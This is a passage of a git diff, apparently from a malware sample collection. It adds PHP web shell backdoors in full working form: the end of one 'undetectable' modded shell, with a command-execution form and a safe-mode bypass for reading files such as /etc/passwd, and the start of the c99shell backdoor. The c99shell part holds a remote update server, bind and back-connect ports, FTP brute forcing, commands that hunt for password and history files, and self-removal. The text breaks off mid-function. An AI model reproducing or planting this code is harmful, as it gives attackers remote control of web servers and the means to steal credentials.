+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxJaheeM". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Undetectable version by
    JaheeM
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +

    :: Shadow's tricks :D ::

    +
    Useful Commands +
    +
    +
    + + + + +   + +
    + Warning. Kernel may be alerted using higher levels
    +
    +
    +
    Kernel Info:
    + + + + + + +
    +

    + + + + + +

    :: Preddy's tricks :D ::

    +
    Php Safe-Mode Bypass (Read Files) +

    +
    +
    + File:

    eg: /etc/passwd
    + + + + + + + Trying To Get File $get
    "; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "
    Start $get

    $source

    Fin $get
    "; + unlink($temp); + } else { + die("
    Sorry... File + ".htmlspecialchars($file)." dosen't exists or you don't have + access.
    "); + } + echo "
    "; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + $chemin
    "; +foreach ($files as $filename) { + echo "
    ";
    +   echo "$filename\n";
    +   echo "
    "; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + +
    +
    +
    +
    +
    Php Safe-Mode Bypass (List Directories):
    +

    + Dir:

    eg: /etc/
    + +
    +

    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ JaheeM v. Modded by JaheeM @ HackerMail . com| \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.c b/PHP/Backdoor.PHP.C99Shell.c new file mode 100644 index 00000000..a1929a84 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.c @@ -0,0 +1,3069 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #13"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ +$surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "c99shell v.".$shver.": access denied"; + +$gzipencode = true; //Encode with gzip? + +$updatenow = false; //If true, update now (this variable will be false) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = true; //if true, don't change modify- and access-time + +$donated_html = "

    Owned by hacker
    "; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = true; //If true then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( +"html"=>array("html","htm","shtml"), +"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), +"exe"=>array("sh","install","bat","cmd"), +"ini"=>array("ini","inf"), +"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), +"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), +"sdb"=>array("sdb"), +"phpsess"=>array("sess"), +"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( +getenv("PHPRC")." -q %f%" => array("php","php3","php4"), +"perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if true and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ +$cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") +); +} +else +{ +$cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") +); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( +array("\"Home\"",$surl), +array("\"Back\"","#\" onclick=\"history.back(1)"), +array("\"Forward\"","#\" onclick=\"history.go(1)"), +array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), +array("\"Refresh\"",""), +array("\"Search\"",$surl."act=search&d=%d"), +array("\"Buffer\"",$surl."act=fsbuff&d=%d"), +array("Encoder",$surl."act=encoder&d=%d"), +array("Tools",$surl."act=tools&d=%d"), +array("Proc.",$surl."act=processes&d=%d"), +array("FTP brute",$surl."act=ftpquickbrute&d=%d"), +array("Sec.",$surl."act=security&d=%d"), +array("SQL",$surl."act=sql&d=%d"), +array("PHP-code",$surl."act=eval&d=%d"), +array("Update",$surl."act=update&d=%d"), +array("Feedback",$surl."act=feedback&d=%d"), +array("Self remove",$surl."act=selfremove"), +array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ +if (empty($md5_pass)) {$md5_pass = md5($pass);} +if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) +{ + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); +} +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ +$disablefunc = str_replace(" ","",$disablefunc); +$disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ +global $sess_data; +global $act; +foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} +foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); +sort($sess_data["copy"]); +sort($sess_data["cut"]); +if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} +else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ +global $sess_cookie; +global $sess_data; +c99_buff_prepare(); +$sess_data = $data; +$data = serialize($data); +setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ +if (!empty($_GET[$v])) {$$v = $_GET[$v];} +if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ +if (!empty($sort)) {setcookie("sort",$sort);} +if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ +if (strlen($content) > $len) +{ + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); +} +else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ +if (!is_numeric($size)) {return false;} +else +{ + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; +} +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$h = opendir($d); +while (($o = readdir($h)) !== false) +{ + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } +} +closedir($h); +return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); +if (!is_dir(dirname($t))) {mkdir(dirname($t));} +if (is_dir($d)) +{ + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); +} +elseif (is_file($d)) {return copy($d,$t);} +else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ +$h = opendir($d); +if (!is_dir($t)) {mkdir($t);} +while (($o = readdir($h)) !== false) +{ + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } +} +closedir($h); +return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +$t = str_replace("\\",DIRECTORY_SEPARATOR,$t); +if (is_dir($d)) +{ + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); +} +elseif (is_file($d)) +{ + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} +} +else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ +$h = opendir($d); +while (($o = readdir($h)) !== false) +{ + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } +} +closedir($h); +rmdir($d); +return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ +$o = str_replace("\\",DIRECTORY_SEPARATOR,$o); +if (is_dir($o)) +{ + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); +} +elseif (is_file($o)) {return unlink($o);} +else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ +global $disablefunc; +$result = ""; +if (!empty($cmd)) +{ + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== false) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); 